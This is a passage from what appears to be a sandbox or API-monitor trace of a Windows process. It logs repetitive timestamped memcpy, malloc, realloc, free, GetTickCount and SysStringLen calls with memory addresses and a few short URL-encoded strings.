[0102.938] memcpy (in: _Dst=0x24adf9d328c, _Src=0x24adf9df748, _Size=0x4 | out: _Dst=0x24adf9d328c) returned 0x24adf9d328c [0102.938] memcpy (in: _Dst=0x24adf9d3288, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d3288) returned 0x24adf9d3288 [0102.939] free (_Block=0x24ae1410f30) [0102.939] GetTickCount () returned 0x210db63 [0102.939] memcpy (in: _Dst=0x24adf9df7c8, _Src=0x24adf9d328c, _Size=0x4 | out: _Dst=0x24adf9df7c8) returned 0x24adf9df7c8 [0102.939] malloc (_Size=0x28) returned 0x24ae1410510 [0102.939] GetTickCount () returned 0x210db63 [0102.939] malloc (_Size=0x28) returned 0x24ae1411020 [0102.940] GetTickCount () returned 0x210db63 [0102.940] GetTickCount () returned 0x210db63 [0102.940] GetTickCount () returned 0x210db63 [0102.940] memcpy (in: _Dst=0x24adf9df388, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9df388) returned 0x24adf9df388 [0102.940] malloc (_Size=0x28) returned 0x24ae14104b0 [0102.940] GetTickCount () returned 0x210db73 [0102.940] memcpy (in: _Dst=0x24adf9d439c, _Src=0x24adf9df388, _Size=0x4 | out: _Dst=0x24adf9d439c) returned 0x24adf9d439c [0102.940] memcpy (in: _Dst=0x24adf9d4398, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4398) returned 0x24adf9d4398 [0102.941] free (_Block=0x24ae14104b0) [0102.943] GetTickCount () returned 0x210db73 [0102.943] memcpy (in: _Dst=0x24adf9df588, _Src=0x24adf9d439c, _Size=0x4 | out: _Dst=0x24adf9df588) returned 0x24adf9df588 [0102.943] malloc (_Size=0x28) returned 0x24ae1410d80 [0102.943] GetTickCount () returned 0x210db73 [0102.943] malloc (_Size=0x28) returned 0x24ae1410db0 [0102.943] GetTickCount () returned 0x210db73 [0102.943] memcpy (in: _Dst=0x24adf9ca5d2, _Src=0x24adf9df588, _Size=0x4 | out: _Dst=0x24adf9ca5d2) returned 0x24adf9ca5d2 [0102.943] memcpy (in: _Dst=0x24adf9ca5d0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca5d0) returned 0x24adf9ca5d0 [0102.943] memcpy (in: _Dst=0x24adf9ca5cc, _Src=0x24adf9df7c8, _Size=0x4 | out: _Dst=0x24adf9ca5cc) returned 0x24adf9ca5cc [0102.943] memcpy (in: _Dst=0x24adf9ca5ca, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca5ca) returned 0x24adf9ca5ca [0102.943] memcpy (in: _Dst=0x24adf9ca5c6, _Src=0x24adf9df908, _Size=0x4 | out: _Dst=0x24adf9ca5c6) returned 0x24adf9ca5c6 [0102.944] memcpy (in: _Dst=0x24adf9ca5c4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca5c4) returned 0x24adf9ca5c4 [0102.944] memcpy (in: _Dst=0x24adf9ca5c0, _Src=0x24adf9df2e8, _Size=0x4 | out: _Dst=0x24adf9ca5c0) returned 0x24adf9ca5c0 [0102.944] memcpy (in: _Dst=0x24adf9ca5be, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca5be) returned 0x24adf9ca5be [0102.944] memcpy (in: _Dst=0x24adf9ca5ba, _Src=0x24adf9df8e8, _Size=0x4 | out: _Dst=0x24adf9ca5ba) returned 0x24adf9ca5ba [0102.944] memcpy (in: _Dst=0x24adf9ca5b8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca5b8) returned 0x24adf9ca5b8 [0102.944] free (_Block=0x24ae1410db0) [0102.944] SysStringLen (param_1="%33%3e%c2%84%5f") returned 0xf [0102.944] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13aeeb0 [0102.945] memcpy (in: _Dst=0x24adf9d48a8, _Src=0x24ae13aeeb0, _Size=0x8 | out: _Dst=0x24adf9d48a8) returned 0x24adf9d48a8 [0102.945] free (_Block=0x24ae13aeeb0) [0102.946] malloc (_Size=0x2e0) returned 0x24ae140d580 [0102.946] malloc (_Size=0x20) returned 0x24ae1410ae0 [0102.946] malloc (_Size=0x288) returned 0x24ae13c6390 [0102.946] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139c460 [0102.946] realloc (_Block=0x24ae1410ae0, _Size=0x40) returned 0x24ae1394800 [0102.946] realloc (_Block=0x24ae139c460, _Size=0x280) returned 0x24ae13c6620 [0102.946] malloc (_Size=0x508) returned 0x24ae1486f10 [0102.946] realloc (_Block=0x24ae1394800, _Size=0x80) returned 0x24ae1482720 [0102.946] realloc (_Block=0x24ae13c6620, _Size=0x500) returned 0x24ae1487930 [0102.946] malloc (_Size=0xa08) returned 0x24ae13b65f0 [0102.946] realloc (_Block=0x24ae1482720, _Size=0x100) returned 0x24ae1474cc0 [0102.946] realloc (_Block=0x24ae1487930, _Size=0xa00) returned 0x24ae13af740 [0102.946] malloc (_Size=0x1408) returned 0x24ae13fed10 [0102.947] realloc (_Block=0x24ae1474cc0, _Size=0x200) returned 0x24ae14169c0 [0102.947] realloc (_Block=0x24ae13af740, _Size=0x1400) returned 0x24ae13fb0e0 [0102.947] malloc (_Size=0x2808) returned 0x24ae18a39c0 [0102.947] malloc (_Size=0x28) returned 0x24ae1410960 [0102.947] GetTickCount () returned 0x210db73 [0102.948] malloc (_Size=0x28) returned 0x24ae1410f30 [0102.948] GetTickCount () returned 0x210db73 [0102.948] malloc (_Size=0x28) returned 0x24ae14107e0 [0102.948] GetTickCount () returned 0x210db73 [0102.948] malloc (_Size=0x28) returned 0x24ae1410990 [0102.948] GetTickCount () returned 0x210db73 [0102.948] GetTickCount () returned 0x210db73 [0102.948] GetTickCount () returned 0x210db73 [0102.948] GetTickCount () returned 0x210db73 [0102.948] memcpy (in: _Dst=0x24adf9df768, _Src=0xd6788fabe0, _Size=0x6 | out: _Dst=0x24adf9df768) returned 0x24adf9df768 [0102.948] malloc (_Size=0x28) returned 0x24ae14104b0 [0102.948] GetTickCount () returned 0x210db73 [0102.949] memcpy (in: _Dst=0x24adf9d48de, _Src=0x24ae1a102d8, _Size=0x10 | out: _Dst=0x24adf9d48de) returned 0x24adf9d48de [0102.949] memcpy (in: _Dst=0x24adf9d48d8, _Src=0x24adf9df768, _Size=0x6 | out: _Dst=0x24adf9d48d8) returned 0x24adf9d48d8 [0102.949] free (_Block=0x24ae14104b0) [0102.950] malloc (_Size=0x28) returned 0x24ae1410840 [0102.950] GetTickCount () returned 0x210db73 [0102.950] malloc (_Size=0x28) returned 0x24ae1410ae0 [0102.950] GetTickCount () returned 0x210db73 [0102.950] malloc (_Size=0x28) returned 0x24ae1410a20 [0102.950] GetTickCount () returned 0x210db73 [0102.950] memcpy (in: _Dst=0x24adf9d424e, _Src=0x24adf9df688, _Size=0x2 | out: _Dst=0x24adf9d424e) returned 0x24adf9d424e [0102.950] memcpy (in: _Dst=0x24adf9d424c, _Src=0x24adf9df308, _Size=0x2 | out: _Dst=0x24adf9d424c) returned 0x24adf9d424c [0102.950] memcpy (in: _Dst=0x24adf9d424a, _Src=0x24adf9df448, _Size=0x2 | out: _Dst=0x24adf9d424a) returned 0x24adf9d424a [0102.950] memcpy (in: _Dst=0x24adf9d4248, _Src=0x24adf9df968, _Size=0x2 | out: _Dst=0x24adf9d4248) returned 0x24adf9d4248 [0102.951] free (_Block=0x24ae1410a20) [0102.951] GetTickCount () returned 0x210db73 [0102.951] GetTickCount () returned 0x210db73 [0102.951] memcpy (in: _Dst=0x24adf9df9e8, _Src=0xd6788f9710, _Size=0x4 | out: _Dst=0x24adf9df9e8) returned 0x24adf9df9e8 [0102.951] malloc (_Size=0x28) returned 0x24ae1410fc0 [0102.951] GetTickCount () returned 0x210db73 [0102.951] memcpy (in: _Dst=0x24adf9d3dcc, _Src=0x24adf9df9e8, _Size=0x4 | out: _Dst=0x24adf9d3dcc) returned 0x24adf9d3dcc [0102.951] memcpy (in: _Dst=0x24adf9d3dc8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d3dc8) returned 0x24adf9d3dc8 [0102.952] free (_Block=0x24ae1410fc0) [0102.952] GetTickCount () returned 0x210db73 [0102.952] memcpy (in: _Dst=0x24adf9df6e8, _Src=0x24adf9d3dcc, _Size=0x4 | out: _Dst=0x24adf9df6e8) returned 0x24adf9df6e8 [0102.952] malloc (_Size=0x28) returned 0x24ae1410600 [0102.952] GetTickCount () returned 0x210db73 [0102.952] GetTickCount () returned 0x210db73 [0102.952] GetTickCount () returned 0x210db73 [0102.952] memcpy (in: _Dst=0x24adf9df808, _Src=0xd6788f9710, _Size=0x4 | out: _Dst=0x24adf9df808) returned 0x24adf9df808 [0102.952] malloc (_Size=0x28) returned 0x24ae1410ba0 [0102.952] GetTickCount () returned 0x210db73 [0102.952] memcpy (in: _Dst=0x24adf9d45dc, _Src=0x24adf9df808, _Size=0x4 | out: _Dst=0x24adf9d45dc) returned 0x24adf9d45dc [0102.952] memcpy (in: _Dst=0x24adf9d45d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d45d8) returned 0x24adf9d45d8 [0102.953] free (_Block=0x24ae1410ba0) [0102.953] GetTickCount () returned 0x210db73 [0102.953] memcpy (in: _Dst=0x24adf9df468, _Src=0x24adf9d45dc, _Size=0x4 | out: _Dst=0x24adf9df468) returned 0x24adf9df468 [0102.953] malloc (_Size=0x28) returned 0x24ae1410870 [0102.953] GetTickCount () returned 0x210db73 [0102.953] malloc (_Size=0x28) returned 0x24ae1410bd0 [0102.953] GetTickCount () returned 0x210db73 [0102.953] GetTickCount () returned 0x210db73 [0102.953] GetTickCount () returned 0x210db73 [0102.953] memcpy (in: _Dst=0x24adf9df6a8, _Src=0xd6788f9710, _Size=0x4 | out: _Dst=0x24adf9df6a8) returned 0x24adf9df6a8 [0102.953] malloc (_Size=0x28) returned 0x24ae1410930 [0102.953] GetTickCount () returned 0x210db73 [0102.953] memcpy (in: _Dst=0x24adf9d487c, _Src=0x24adf9df6a8, _Size=0x4 | out: _Dst=0x24adf9d487c) returned 0x24adf9d487c [0102.953] memcpy (in: _Dst=0x24adf9d4878, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4878) returned 0x24adf9d4878 [0102.954] free (_Block=0x24ae1410930) [0102.954] GetTickCount () returned 0x210db73 [0102.954] memcpy (in: _Dst=0x24adf9df488, _Src=0x24adf9d487c, _Size=0x4 | out: _Dst=0x24adf9df488) returned 0x24adf9df488 [0102.954] malloc (_Size=0x28) returned 0x24ae14109c0 [0102.954] GetTickCount () returned 0x210db73 [0102.954] malloc (_Size=0x28) returned 0x24ae1410ba0 [0102.954] GetTickCount () returned 0x210db73 [0102.954] GetTickCount () returned 0x210db73 [0102.954] GetTickCount () returned 0x210db73 [0102.954] memcpy (in: _Dst=0x24adf9df9a8, _Src=0xd6788f9710, _Size=0x4 | out: _Dst=0x24adf9df9a8) returned 0x24adf9df9a8 [0102.954] malloc (_Size=0x28) returned 0x24ae14108a0 [0102.954] GetTickCount () returned 0x210db73 [0102.954] memcpy (in: _Dst=0x24adf9d415c, _Src=0x24adf9df9a8, _Size=0x4 | out: _Dst=0x24adf9d415c) returned 0x24adf9d415c [0102.954] memcpy (in: _Dst=0x24adf9d4158, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4158) returned 0x24adf9d4158 [0102.955] free (_Block=0x24ae14108a0) [0102.959] GetTickCount () returned 0x210db83 [0102.959] memcpy (in: _Dst=0x24adf9df928, _Src=0x24adf9d415c, _Size=0x4 | out: _Dst=0x24adf9df928) returned 0x24adf9df928 [0102.959] malloc (_Size=0x28) returned 0x24ae14106c0 [0102.959] GetTickCount () returned 0x210db83 [0102.959] malloc (_Size=0x28) returned 0x24ae1410db0 [0102.959] GetTickCount () returned 0x210db83 [0102.959] memcpy (in: _Dst=0x24adf9ca78c, _Src=0x24adf9df928, _Size=0x4 | out: _Dst=0x24adf9ca78c) returned 0x24adf9ca78c [0102.959] memcpy (in: _Dst=0x24adf9ca78a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca78a) returned 0x24adf9ca78a [0102.959] memcpy (in: _Dst=0x24adf9ca786, _Src=0x24adf9df488, _Size=0x4 | out: _Dst=0x24adf9ca786) returned 0x24adf9ca786 [0102.959] memcpy (in: _Dst=0x24adf9ca784, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca784) returned 0x24adf9ca784 [0102.959] memcpy (in: _Dst=0x24adf9ca780, _Src=0x24adf9df468, _Size=0x4 | out: _Dst=0x24adf9ca780) returned 0x24adf9ca780 [0102.959] memcpy (in: _Dst=0x24adf9ca77e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca77e) returned 0x24adf9ca77e [0102.959] memcpy (in: _Dst=0x24adf9ca77a, _Src=0x24adf9df6e8, _Size=0x4 | out: _Dst=0x24adf9ca77a) returned 0x24adf9ca77a [0102.959] memcpy (in: _Dst=0x24adf9ca778, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca778) returned 0x24adf9ca778 [0102.960] free (_Block=0x24ae1410db0) [0102.960] SysStringLen (param_1="%69%6e%6f%65") returned 0xc [0102.960] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae900 [0102.960] memcpy (in: _Dst=0x24adf9d4488, _Src=0x24ae13ae900, _Size=0x8 | out: _Dst=0x24adf9d4488) returned 0x24adf9d4488 [0102.961] free (_Block=0x24ae13ae900) [0102.961] malloc (_Size=0x28) returned 0x24ae1410db0 [0102.961] GetTickCount () returned 0x210db83 [0102.961] GetTickCount () returned 0x210db83 [0102.961] GetTickCount () returned 0x210db83 [0102.961] GetTickCount () returned 0x210db83 [0102.961] memcpy (in: _Dst=0x24adf9df568, _Src=0xd6788fabe0, _Size=0x6 | out: _Dst=0x24adf9df568) returned 0x24adf9df568 [0102.961] malloc (_Size=0x28) returned 0x24ae1410de0 [0102.961] GetTickCount () returned 0x210db83 [0102.961] memcpy (in: _Dst=0x24adf9d44ee, _Src=0x24ae1a102d8, _Size=0x10 | out: _Dst=0x24adf9d44ee) returned 0x24adf9d44ee [0102.961] memcpy (in: _Dst=0x24adf9d44e8, _Src=0x24adf9df568, _Size=0x6 | out: _Dst=0x24adf9d44e8) returned 0x24adf9d44e8 [0102.962] free (_Block=0x24ae1410de0) [0102.962] malloc (_Size=0x70) returned 0x24ae141bc60 [0102.962] GetTickCount () returned 0x210db83 [0102.962] GetTickCount () returned 0x210db83 [0102.962] malloc (_Size=0x28) returned 0x24ae14109f0 [0102.963] GetTickCount () returned 0x210db83 [0102.963] malloc (_Size=0x28) returned 0x24ae14108a0 [0102.963] GetTickCount () returned 0x210db83 [0102.963] malloc (_Size=0x28) returned 0x24ae1410900 [0102.963] GetTickCount () returned 0x210db83 [0102.963] malloc (_Size=0x28) returned 0x24ae1410de0 [0102.963] GetTickCount () returned 0x210db83 [0102.963] GetTickCount () returned 0x210db83 [0102.963] memcpy (in: _Dst=0x24adf9d3e00, _Src=0x24adf9df288, _Size=0x2 | out: _Dst=0x24adf9d3e00) returned 0x24adf9d3e00 [0102.963] memcpy (in: _Dst=0x24adf9d3dfe, _Src=0x24adf9df2c8, _Size=0x2 | out: _Dst=0x24adf9d3dfe) returned 0x24adf9d3dfe [0102.964] memcpy (in: _Dst=0x24adf9d3dfc, _Src=0x24adf9df8a8, _Size=0x2 | out: _Dst=0x24adf9d3dfc) returned 0x24adf9d3dfc [0102.964] memcpy (in: _Dst=0x24adf9d3dfa, _Src=0x24adf9df648, _Size=0x2 | out: _Dst=0x24adf9d3dfa) returned 0x24adf9d3dfa [0102.964] memcpy (in: _Dst=0x24adf9d3df8, _Src=0x24adf9df248, _Size=0x2 | out: _Dst=0x24adf9d3df8) returned 0x24adf9d3df8 [0102.964] free (_Block=0x24ae1410de0) [0102.964] GetTickCount () returned 0x210db83 [0102.964] GetTickCount () returned 0x210db83 [0102.964] memcpy (in: _Dst=0x24adf9df8c8, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9df8c8) returned 0x24adf9df8c8 [0102.964] malloc (_Size=0x28) returned 0x24ae1410de0 [0102.964] GetTickCount () returned 0x210db83 [0102.964] memcpy (in: _Dst=0x24adf9d433c, _Src=0x24adf9df8c8, _Size=0x4 | out: _Dst=0x24adf9d433c) returned 0x24adf9d433c [0102.964] memcpy (in: _Dst=0x24adf9d4338, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4338) returned 0x24adf9d4338 [0102.965] free (_Block=0x24ae1410de0) [0102.965] GetTickCount () returned 0x210db83 [0102.965] memcpy (in: _Dst=0x24adf9df4c8, _Src=0x24adf9d433c, _Size=0x4 | out: _Dst=0x24adf9df4c8) returned 0x24adf9df4c8 [0102.965] malloc (_Size=0x28) returned 0x24ae1410690 [0102.965] GetTickCount () returned 0x210db83 [0102.965] GetTickCount () returned 0x210db83 [0102.965] GetTickCount () returned 0x210db83 [0102.965] memcpy (in: _Dst=0x24adf9df5a8, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9df5a8) returned 0x24adf9df5a8 [0102.965] malloc (_Size=0x28) returned 0x24ae1410930 [0102.965] GetTickCount () returned 0x210db83 [0102.965] memcpy (in: _Dst=0x24adf9d43fc, _Src=0x24adf9df5a8, _Size=0x4 | out: _Dst=0x24adf9d43fc) returned 0x24adf9d43fc [0102.965] memcpy (in: _Dst=0x24adf9d43f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d43f8) returned 0x24adf9d43f8 [0102.966] free (_Block=0x24ae1410930) [0102.966] GetTickCount () returned 0x210db83 [0102.966] memcpy (in: _Dst=0x24adf9df4e8, _Src=0x24adf9d43fc, _Size=0x4 | out: _Dst=0x24adf9df4e8) returned 0x24adf9df4e8 [0102.966] malloc (_Size=0x28) returned 0x24ae1410a20 [0102.966] GetTickCount () returned 0x210db83 [0102.966] malloc (_Size=0x28) returned 0x24ae1410540 [0102.966] GetTickCount () returned 0x210db83 [0102.966] GetTickCount () returned 0x210db83 [0102.966] GetTickCount () returned 0x210db83 [0102.966] memcpy (in: _Dst=0x24adf9df708, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9df708) returned 0x24adf9df708 [0102.966] malloc (_Size=0x28) returned 0x24ae1410de0 [0102.966] GetTickCount () returned 0x210db83 [0102.966] memcpy (in: _Dst=0x24adf9d454c, _Src=0x24adf9df708, _Size=0x4 | out: _Dst=0x24adf9d454c) returned 0x24adf9d454c [0102.966] memcpy (in: _Dst=0x24adf9d4548, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4548) returned 0x24adf9d4548 [0102.967] free (_Block=0x24ae1410de0) [0102.967] GetTickCount () returned 0x210db83 [0102.967] memcpy (in: _Dst=0x24adf9df328, _Src=0x24adf9d454c, _Size=0x4 | out: _Dst=0x24adf9df328) returned 0x24adf9df328 [0102.967] malloc (_Size=0x28) returned 0x24ae1410570 [0102.967] GetTickCount () returned 0x210db83 [0102.967] malloc (_Size=0x28) returned 0x24ae1410630 [0102.967] GetTickCount () returned 0x210db83 [0102.967] GetTickCount () returned 0x210db83 [0102.967] GetTickCount () returned 0x210db83 [0102.967] memcpy (in: _Dst=0x24adf9df348, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9df348) returned 0x24adf9df348 [0102.967] malloc (_Size=0x28) returned 0x24ae1410930 [0102.967] GetTickCount () returned 0x210db83 [0102.967] memcpy (in: _Dst=0x24adf9d47ec, _Src=0x24adf9df348, _Size=0x4 | out: _Dst=0x24adf9d47ec) returned 0x24adf9d47ec [0102.967] memcpy (in: _Dst=0x24adf9d47e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d47e8) returned 0x24adf9d47e8 [0102.967] free (_Block=0x24ae1410930) [0102.967] GetTickCount () returned 0x210db83 [0102.968] memcpy (in: _Dst=0x24adf9df408, _Src=0x24adf9d47ec, _Size=0x4 | out: _Dst=0x24adf9df408) returned 0x24adf9df408 [0102.968] malloc (_Size=0x28) returned 0x24ae1410de0 [0102.968] GetTickCount () returned 0x210db83 [0102.968] malloc (_Size=0x28) returned 0x24ae1410fc0 [0102.968] GetTickCount () returned 0x210db83 [0102.968] GetTickCount () returned 0x210db83 [0102.968] GetTickCount () returned 0x210db83 [0102.968] memcpy (in: _Dst=0x24adf9df5c8, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9df5c8) returned 0x24adf9df5c8 [0102.968] malloc (_Size=0x28) returned 0x24ae1410660 [0102.968] GetTickCount () returned 0x210db83 [0102.968] memcpy (in: _Dst=0x24adf9d403c, _Src=0x24adf9df5c8, _Size=0x4 | out: _Dst=0x24adf9d403c) returned 0x24adf9d403c [0102.968] memcpy (in: _Dst=0x24adf9d4038, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4038) returned 0x24adf9d4038 [0102.968] free (_Block=0x24ae1410660) [0102.968] GetTickCount () returned 0x210db83 [0102.968] memcpy (in: _Dst=0x24adf9dfc08, _Src=0x24adf9d403c, _Size=0x4 | out: _Dst=0x24adf9dfc08) returned 0x24adf9dfc08 [0102.968] malloc (_Size=0x28) returned 0x24ae14104b0 [0102.969] GetTickCount () returned 0x210db83 [0102.969] malloc (_Size=0x28) returned 0x24ae1410660 [0102.969] GetTickCount () returned 0x210db83 [0102.969] memcpy (in: _Dst=0x24adf9ca592, _Src=0x24adf9dfc08, _Size=0x4 | out: _Dst=0x24adf9ca592) returned 0x24adf9ca592 [0102.969] memcpy (in: _Dst=0x24adf9ca590, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca590) returned 0x24adf9ca590 [0102.969] memcpy (in: _Dst=0x24adf9ca58c, _Src=0x24adf9df408, _Size=0x4 | out: _Dst=0x24adf9ca58c) returned 0x24adf9ca58c [0102.969] memcpy (in: _Dst=0x24adf9ca58a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca58a) returned 0x24adf9ca58a [0102.969] memcpy (in: _Dst=0x24adf9ca586, _Src=0x24adf9df328, _Size=0x4 | out: _Dst=0x24adf9ca586) returned 0x24adf9ca586 [0102.969] memcpy (in: _Dst=0x24adf9ca584, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca584) returned 0x24adf9ca584 [0102.969] memcpy (in: _Dst=0x24adf9ca580, _Src=0x24adf9df4e8, _Size=0x4 | out: _Dst=0x24adf9ca580) returned 0x24adf9ca580 [0102.969] memcpy (in: _Dst=0x24adf9ca57e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca57e) returned 0x24adf9ca57e [0102.969] memcpy (in: _Dst=0x24adf9ca57a, _Src=0x24adf9df4c8, _Size=0x4 | out: _Dst=0x24adf9ca57a) returned 0x24adf9ca57a [0102.969] memcpy (in: _Dst=0x24adf9ca578, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ca578) returned 0x24adf9ca578 [0102.969] free (_Block=0x24ae1410660) [0102.969] SysStringLen (param_1="%58%3d%30%c2%bf") returned 0xf [0102.969] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae690 [0102.969] memcpy (in: _Dst=0x24adf9d4608, _Src=0x24ae13ae690, _Size=0x8 | out: _Dst=0x24adf9d4608) returned 0x24adf9d4608 [0102.969] free (_Block=0x24ae13ae690) [0102.970] malloc (_Size=0x2e0) returned 0x24ae140ea10 [0102.970] malloc (_Size=0x20) returned 0x24ae1410660 [0102.970] malloc (_Size=0x288) returned 0x24ae13c6620 [0102.970] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139c460 [0102.970] realloc (_Block=0x24ae1410660, _Size=0x40) returned 0x24ae1394a80 [0102.970] realloc (_Block=0x24ae139c460, _Size=0x280) returned 0x24ae13c7060 [0102.970] malloc (_Size=0x508) returned 0x24ae1487420 [0102.970] realloc (_Block=0x24ae1394a80, _Size=0x80) returned 0x24ae1482600 [0102.970] realloc (_Block=0x24ae13c7060, _Size=0x500) returned 0x24ae1487930 [0102.970] malloc (_Size=0xa08) returned 0x24ae13b33a0 [0102.970] realloc (_Block=0x24ae1482600, _Size=0x100) returned 0x24ae1474cc0 [0102.970] realloc (_Block=0x24ae1487930, _Size=0xa00) returned 0x24ae13b3db0 [0102.970] malloc (_Size=0x1408) returned 0x24ae13fc4f0 [0102.970] realloc (_Block=0x24ae1474cc0, _Size=0x200) returned 0x24ae1416ff0 [0102.970] realloc (_Block=0x24ae13b3db0, _Size=0x1400) returned 0x24ae13fd900 [0102.970] malloc (_Size=0x2808) returned 0x24ae18ba250 [0102.971] malloc (_Size=0x28) returned 0x24ae1410660 [0102.972] GetTickCount () returned 0x210db92 [0102.972] malloc (_Size=0x28) returned 0x24ae1410930 [0102.972] GetTickCount () returned 0x210db92 [0102.973] malloc (_Size=0x28) returned 0x24ae14106f0 [0102.973] GetTickCount () returned 0x210db92 [0102.973] malloc (_Size=0x28) returned 0x24ae1410a50 [0102.973] GetTickCount () returned 0x210db92 [0102.973] GetTickCount () returned 0x210db92 [0102.973] GetTickCount () returned 0x210db92 [0102.973] GetTickCount () returned 0x210db92 [0102.973] GetTickCount () returned 0x210db92 [0102.973] GetTickCount () returned 0x210db92 [0102.973] memcpy (in: _Dst=0x24adf9e00c8, _Src=0xd6788fabe0, _Size=0x6 | out: _Dst=0x24adf9e00c8) returned 0x24adf9e00c8 [0102.973] malloc (_Size=0x28) returned 0x24ae1410a80 [0102.973] GetTickCount () returned 0x210db92 [0102.973] memcpy (in: _Dst=0x24adf9d3f7e, _Src=0x24ae1a102d8, _Size=0x10 | out: _Dst=0x24adf9d3f7e) returned 0x24adf9d3f7e [0102.973] memcpy (in: _Dst=0x24adf9d3f78, _Src=0x24adf9e00c8, _Size=0x6 | out: _Dst=0x24adf9d3f78) returned 0x24adf9d3f78 [0102.974] free (_Block=0x24ae1410a80) [0102.974] malloc (_Size=0x70) returned 0x24ae141bde0 [0102.974] GetTickCount () returned 0x210db92 [0102.974] GetTickCount () returned 0x210db92 [0102.974] malloc (_Size=0x28) returned 0x24ae1410a80 [0102.974] GetTickCount () returned 0x210db92 [0102.974] malloc (_Size=0x28) returned 0x24ae1410e10 [0102.974] GetTickCount () returned 0x210db92 [0102.974] GetTickCount () returned 0x210db92 [0102.974] malloc (_Size=0x28) returned 0x24ae1411bf0 [0102.975] GetTickCount () returned 0x210db92 [0102.975] malloc (_Size=0x28) returned 0x24ae1411590 [0102.975] GetTickCount () returned 0x210db92 [0102.975] malloc (_Size=0x28) returned 0x24ae14114a0 [0102.975] GetTickCount () returned 0x210db92 [0102.975] memcpy (in: _Dst=0x24adf9d3e32, _Src=0x24adf9dfc28, _Size=0x2 | out: _Dst=0x24adf9d3e32) returned 0x24adf9d3e32 [0102.975] memcpy (in: _Dst=0x24adf9d3e30, _Src=0x24adf9dfa48, _Size=0x2 | out: _Dst=0x24adf9d3e30) returned 0x24adf9d3e30 [0102.975] memcpy (in: _Dst=0x24adf9d3e2e, _Src=0x24adf9dfea8, _Size=0x2 | out: _Dst=0x24adf9d3e2e) returned 0x24adf9d3e2e [0102.975] memcpy (in: _Dst=0x24adf9d3e2c, _Src=0x24adf9e0088, _Size=0x2 | out: _Dst=0x24adf9d3e2c) returned 0x24adf9d3e2c [0102.975] memcpy (in: _Dst=0x24adf9d3e2a, _Src=0x24adf9dfe88, _Size=0x2 | out: _Dst=0x24adf9d3e2a) returned 0x24adf9d3e2a [0102.975] memcpy (in: _Dst=0x24adf9d3e28, _Src=0x24adf9dfb88, _Size=0x2 | out: _Dst=0x24adf9d3e28) returned 0x24adf9d3e28 [0102.976] free (_Block=0x24ae14114a0) [0102.976] GetTickCount () returned 0x210db92 [0102.976] GetTickCount () returned 0x210db92 [0102.976] memcpy (in: _Dst=0x24adf9dfec8, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9dfec8) returned 0x24adf9dfec8 [0102.976] malloc (_Size=0x28) returned 0x24ae1411350 [0102.976] GetTickCount () returned 0x210db92 [0102.976] memcpy (in: _Dst=0x24adf9d481c, _Src=0x24adf9dfec8, _Size=0x4 | out: _Dst=0x24adf9d481c) returned 0x24adf9d481c [0102.976] memcpy (in: _Dst=0x24adf9d4818, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4818) returned 0x24adf9d4818 [0102.977] free (_Block=0x24ae1411350) [0102.977] GetTickCount () returned 0x210db92 [0102.977] memcpy (in: _Dst=0x24adf9dfde8, _Src=0x24adf9d481c, _Size=0x4 | out: _Dst=0x24adf9dfde8) returned 0x24adf9dfde8 [0102.977] malloc (_Size=0x28) returned 0x24ae14114a0 [0102.977] GetTickCount () returned 0x210db92 [0102.977] GetTickCount () returned 0x210db92 [0102.977] GetTickCount () returned 0x210db92 [0102.977] memcpy (in: _Dst=0x24adf9dfc48, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9dfc48) returned 0x24adf9dfc48 [0102.977] malloc (_Size=0x28) returned 0x24ae14113e0 [0102.977] GetTickCount () returned 0x210db92 [0102.977] memcpy (in: _Dst=0x24adf9d475c, _Src=0x24adf9dfc48, _Size=0x4 | out: _Dst=0x24adf9d475c) returned 0x24adf9d475c [0102.977] memcpy (in: _Dst=0x24adf9d4758, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d4758) returned 0x24adf9d4758 [0102.978] free (_Block=0x24ae14113e0) [0102.978] GetTickCount () returned 0x210db92 [0102.978] memcpy (in: _Dst=0x24adf9e0028, 